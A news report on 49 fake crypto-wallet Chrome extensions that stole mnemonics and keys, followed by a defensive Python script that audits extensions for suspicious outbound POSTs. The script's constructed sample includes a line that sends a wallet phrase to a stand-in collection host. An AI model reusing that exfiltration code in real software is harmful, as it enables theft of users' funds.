49 Chrome malware plugins got caught stealing from purchases

Google removed 49 plugins from the Chrome Web Store. They were posing as cryptocurrency wallets.

Official status does not guarantee reliability

The plugins were detected by researchers from MyCrypto, an open-source blockchain interface, and PhishFort, which sells anti-phishing protection.

Harry Denley, MyCrypto's Director of Security, noted that malicious plugins are nothing new. These targeted Ledger hardware wallets (57% of the plugins were built for them), Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus and KeepKey.

The plugins are essentially phishing for secrets: they collect users' mnemonic phrases, private keys and keystore files (the same kind of file that holds keys used for developer identification or SSL encryption).

Once the user enters this confidential data, the plugin sends it in an HTTP POST request to a backend. That is where the perpetrators collect the secrets and use them to withdraw money from the wallets.

MyCrypto identified 14 unique command-and-control (C2) servers that received data from compromised users.

After analyzing the servers, the researchers found that some of them were connected, which means they were run by a single hacking group.

Some of the backends funneled the data into a Google Docs form; the rest were custom PHP scripts uploaded to the backend.

The hackers who created the fake plugins are probably from Russia

Most of the domains are new: 80% of them were registered in March or April.

The first domain, ledger.productions, is wired to other servers. This gave the researchers a picture of the backend set, and of the actors operating most of the plugins.

One of the servers even gave some clues: the operation was likely being controlled from Russia, especially considering that the administrator's email address ends in "r.ru".

The process imitates the standard MyEtherWallet flow until the user enters their secret data.

The malicious app sends the data back to the C2 servers and then returns the user to the default view.

This leaves the user frustrated and hands the malware fresh secrets. After that, users usually delete the plugin and forget about it until their wallet is robbed.

The theft happens only after the plugin has been deleted, so users have no idea how their money could have been stolen.

Some of the plugins were rated by bogus reviewers who left fake glowing reviews. These were short and amateurish, such as "good", "useful app" or "legal".

The fake MyEtherWallet plugin reused one and the same "copy": the same review was posted about 8 times by different users.

All of these reviews explained what BTC is and why MyEtherWallet was the preferable choice for use in a browser.

The researchers sent funds to several addresses and submitted the corresponding secret data to the malicious plugins. Still, that data was not acted on, probably because the hackers are only interested in high-value accounts, or perhaps because they sweep the accounts manually.

Although the experts' own submissions to the malware were not exploited, many users reported on support forums such as Chrome's, Reddit and Toshi Times that they had lost their investments.

As a result, Google removed the plugins from the Chrome Web Store within 24 hours of being notified.
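The behaviour described above (a wallet form whose contents are sent by HTTP POST to an attacker-run backend rather than to the wallet vendor) is something a defender can triage statically before installing an unpacked extension. The following script is an added example, not MyCrypto's or PhishFort's tooling: it reads the manifest for overly broad host permissions and scans the JavaScript for `fetch()`/`XMLHttpRequest` POST targets, flagging any host outside the vendor domains the reviewer expects. The sample extension files, the `collect.example.net` endpoint and the `myetherwallet.com` allow-list are constructed placeholders, not the domains from the report.

```python
"""Static triage of an unpacked browser extension for outbound POSTs to
hosts outside the wallet vendor's own domains. Added example; not the
researchers' tooling."""
from __future__ import annotations

import json
import re
from urllib.parse import urlparse

# Constructed sample of an unpacked extension. File names, the endpoint
# collect.example.net and the redirect target are placeholders.
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "name": "Wallet Helper (constructed sample)",
        "version": "0.1",
        "manifest_version": 2,
        "permissions": ["storage", "https://*/*"],
    }),
    "popup.js": (
        "document.getElementById('unlock').addEventListener('submit', async (e) => {\n"
        "  e.preventDefault();\n"
        "  const phrase = document.getElementById('mnemonic').value;\n"
        "  await fetch('https://collect.example.net/api', {method: 'POST', body: phrase});\n"
        "  location.href = 'https://www.myetherwallet.com/';\n"
        "});\n"
    ),
}

# Two common call shapes: fetch(url, {method: 'POST', ...}) and xhr.open('POST', url)
FETCH_POST = re.compile(
    r"""fetch\(\s*['"`](https?://[^'"`]+)['"`]\s*,\s*\{[^}]*?method\s*:\s*['"`]POST['"`]""",
    re.I | re.S,
)
XHR_POST = re.compile(
    r"""\.open\(\s*['"`]POST['"`]\s*,\s*['"`](https?://[^'"`]+)['"`]""", re.I
)
# Host patterns that let a script talk to any origin
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def find_outbound_posts(js_source: str) -> list[str]:
    """Return absolute URLs that receive a POST via fetch() or XMLHttpRequest."""
    urls = FETCH_POST.findall(js_source) + XHR_POST.findall(js_source)
    return sorted(set(urls))


def host_allowed(url: str, allowed_domains: set[str]) -> bool:
    """True if the URL's host is one of the allowed domains or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def audit_extension(files: dict[str, str], allowed_domains: set[str]) -> dict:
    """Flag broad host permissions and POST targets outside the vendor's domains."""
    manifest = json.loads(files.get("manifest.json", "{}"))
    declared = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    suspicious: list[str] = []
    for name, source in files.items():
        if name.endswith(".js"):
            suspicious += [
                u for u in find_outbound_posts(source)
                if not host_allowed(u, allowed_domains)
            ]
    return {
        "name": manifest.get("name"),
        "broad_host_permissions": [p for p in declared if p in BROAD_HOSTS],
        "suspicious_posts": sorted(set(suspicious)),
    }


if __name__ == "__main__":
    # A reviewer of a MyEtherWallet helper would expect traffic only to the vendor
    print(json.dumps(audit_extension(SAMPLE_FILES, {"myetherwallet.com"}), indent=2))
```

On the constructed sample the audit reports the wildcard `https://*/*` permission and the POST to `collect.example.net`; a legitimate wallet helper has no reason for either. Regex matching of call sites is a triage heuristic, not a proof of safety: obfuscated or dynamically built URLs will not be caught, so a clean report still warrants a look at the extension's network traffic in a sandbox.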